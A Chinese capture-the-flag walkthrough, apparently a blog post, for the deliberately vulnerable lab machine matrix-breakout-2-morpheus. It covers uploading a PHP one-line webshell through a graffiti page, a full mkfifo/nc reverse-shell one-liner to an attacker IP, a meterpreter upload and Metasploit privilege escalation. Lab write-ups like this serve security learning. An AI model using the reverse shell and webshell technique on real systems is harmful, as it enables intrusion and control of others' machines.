matrix-breakout-2-morpheus靶机通关

1.目标探测

目标开启了22、80和81端口,其中81端口需要登陆

2.目录探测

使用gobuster探测,字典很重要哈,我之前选了几个简单的,没有爆出来

发现了graffiti.php这个涂鸦界面,可以写一句话代码

写入成功后,用bp拦截,把txt文件改成php,这样就可以执行一句话木马了。

3.建立shell

采用蚁剑连接后,可以建立shell,可以看到第一个flag,但只有www-data权限

当然也可以用nc建立一个反弹shell,nc -e被禁用了,只能采取这样的方式:

复制代码
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.136.204 1234 > /tmp/f

4.建立meterpretershell

生成木马

利用第3步建立的shell上传该木马,并执行。

msf监听

5.使用提权模块

搜索local_exploit

输入meterpreter会话的session id,

发现可利用的提权漏洞,直接选用这个模块,提权

6.溯源情况

相关推荐
腾渊信息科技公司2 小时前
工业数据运维痛点根治方案:基于AI Agent的产线自动化台账系统落地
运维·人工智能·自动化·个人开发·ai编程
Dxy12393102163 小时前
Proxy Protocol v2 详解
运维
踏月的造梦星球3 小时前
DMDPC 学习:架构、部署、运维与调优
运维·数据库·学习·架构
潘正翔3 小时前
docker核心概念
linux·运维·服务器·docker·容器·centos·运维开发
weigangwin4 小时前
agent-workspace-linux 不是远程桌面:Linux AI 工作区的隔离边界验收
linux·xvfb·mcp·桌面隔离·权限边界·bubblewrap·agent-workspace
renhongxia14 小时前
世界模型,是“空中楼阁”还是AGI的“最后一块拼图”?
运维·服务器·数据库·人工智能·算法·agi
Dovis(誓平步青云)5 小时前
远程办公软件文件传输实测:6 款工具的速度、稳定性和办公体验对比
linux·运维·服务器·后端·生成对抗网络
专注_每天进步一点点6 小时前
SLB(绑定弹性公网ip)-gateway-业务pod,gateway上出现reset by peer,业务pod上没有reset by peer
服务器·tcp/ip·gateway
Java小白笔记6 小时前
Docker 安装配置完全指南:MacOS 、Windows、Linux环境下的安装、配置与验证
linux·macos·docker
csdn_aspnet6 小时前
GitHub Actions自动化运维实战,用CI/CD流水线实现测试、部署、安全扫描一体化
运维·安全·ci/cd·自动化·github